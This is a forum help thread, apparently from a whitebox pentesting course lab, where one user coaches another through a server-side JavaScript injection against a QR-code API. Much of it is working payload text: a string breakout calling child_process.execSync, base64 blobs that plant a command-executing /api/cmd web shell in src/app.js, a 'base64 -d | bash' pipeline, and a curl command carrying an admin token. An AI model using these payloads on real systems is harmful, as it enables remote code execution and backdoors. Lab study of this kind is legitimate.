Intro to Whitebox Pentesting - Target Function

No worries you are doing really well!

This: "{ "text": "'})" essentially needs to be more obfuscated.
If you want to know:

"{ "text": "'})

This: require('child_process') needs something.
If you want to know:

+ console.log(require('child_process')

This: .execSync(echo 'YXBwLmdldCgiL2FwaS9jbWQiLCAocmVxLCByZXMpID0+IHsKICBjb25zdCBjbWQgPSByZXF1aXJlKCJjaGlsZF9wcm9jZXNzIikuZXhlY1N5bmMocmVxLnF1ZXJ5LmNtZCkudG9TdHJpbmcoKTsKICByZXMuc2VuZChjbWQpOwp9KTs=')

Quotation needs to be at the beginning:

'echo YXBwLmdldCgiL2FwaS9jbWQiLCAocmVxLCByZXMpID0+IHsKICBjb25zdCBjbWQgPSByZXF1aXJlKCJjaGlsZF9wcm9jZXNzIikuZXhlY1N5bmMocmVxLnF1ZXJ5LmNtZCkudG9TdHJpbmcoKTsKICByZXMuc2VuZChjbWQpOwp9KTs=

You then need to pipe it so the server can base64-decode it, put it within the file, and then you are correct on the last bit. This is how I did it though:

.toString())//" }"

This should all come up with a {"message":"Could not generate QR code."} message.

Though if this shows, don't worry, it actually worked; from there you will need to write the contents of the file name you piped the information to and send it to the app.

Though that will obviously come later. Keep working on it though, you are very close!

text should be with slashes, btw, like this:

{ \"text\": \"'})

ok, now I'm sure that the command I'm running is correct (I hope):

curl -s -X POST http://----------/api/service/generate \
-H "Content-Type: application/json" \
-H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6InRlc3RAaGFja3RoZWJveC5jb20iLCJyb2xlIjoiYWRtaW4iLCJpYXQiOjE3NDk0OTI5NzgsImV4cCI6MTc0OTU3OTM3OH0.55nW6_XD2wMUnTB0GEaI7ILQJwUqQAr_Msu5luLJzN8" \
-d "{ "text": "'}) + console.log(require('child_process').execSync('echo YXBwLmdldCgiL2FwaS9jbWQiLCAocmVxLCByZXMpID0+IHsKICBjb25zdCBjbWQgPSByZXF1aXJlKCJjaGlsZF9wcm9jZXNzIikuZXhlY1N5bmMocmVxLnF1ZXJ5LmNtZCkudG9TdHJpbmcoKTsKICByZXMuc2VuZChjbWQpOwp9KTs=').toString()) //" }"

This sent a {"message":"Could not generate QR code."} message, but the part where I have to pipe the payload into the server is giving me trouble. Can you explain that part to me one last time?? My apologies for the inconvenience!

No inconvenience!

You're so close!

Just within the payload, you will need to tell the server to decode it after your base64 payload:

'echo YXBwLmdldCgiL2FwaS9jbWQiLCAocmVxLCByZXMpID0+IHsKICBjb25zdCBjbWQgPSByZXF1aXJlKCJjaGlsZF9wcm9jZXNzIikuZXhlY1N5bmMocmVxLnF1ZXJ5LmNtZCkudG9TdHJpbmcoKTsKICByZXMuc2VuZChjbWQpOwp9KTs= | base64 --decode > file.txt').toString())//\" }"

After that, you will need to access that file that you gave to the server:

"sed -i \"/app.use((req, res, next) => {/e cat file.txt\" src/app.js" | base64 -w0

Then use your previous command with the base64-encoded command to open file.txt, or whatever file name you specified.

I don't know if I'm doing something wrong, but I'm trying to reach the payload following the path localhost:5000/api/service/generate/payload.js using cURL, and nothing is returned ({"message":"Could not find this route."}). (It's here where I uploaded that payload, right?) I'm not a pro, but I know how to access an endpoint; this exercise is giving me a headache =S hahaha
I'm about to ask you for every step that I take =/

Sorry for late reply!

The endpoint will be something like this:

http://:/api/cmd?cmd=cat+/flag.txt

If you get {"message":"Could not generate QR code."} with your payload, you should be able to get the flag.

This is probably the most important bit. You can use mine, though if you want to try it out for yourself then go ahead, but here's probably the most important bit:

-d "{ \"text\": \"'})+ console.log(require('child_process').execSync('echo c2VkIC1pICIvYXBwLnVzZSgocmVxLCByZXMsIG5leHQpID0+IHsvZSBjYXQgcHduZWQudHh0IiBzcmMvYXBwLmpzCg== | base64 -d | bash').toString())//\" }"

Man, hope you don't judge me… but I'm done with this. I looked for a script that brought a smile to my face, and I solved it, after many days struggling with the syntax and the multiple combinations.
Thank you so much for your support and your time, I really appreciate that; hopefully in the future I'll be able to help you with something =)

Well done man! I knew you were going to get it some time haha! Don't hesitate to reach out for help; at the end of the day we are all here to learn!
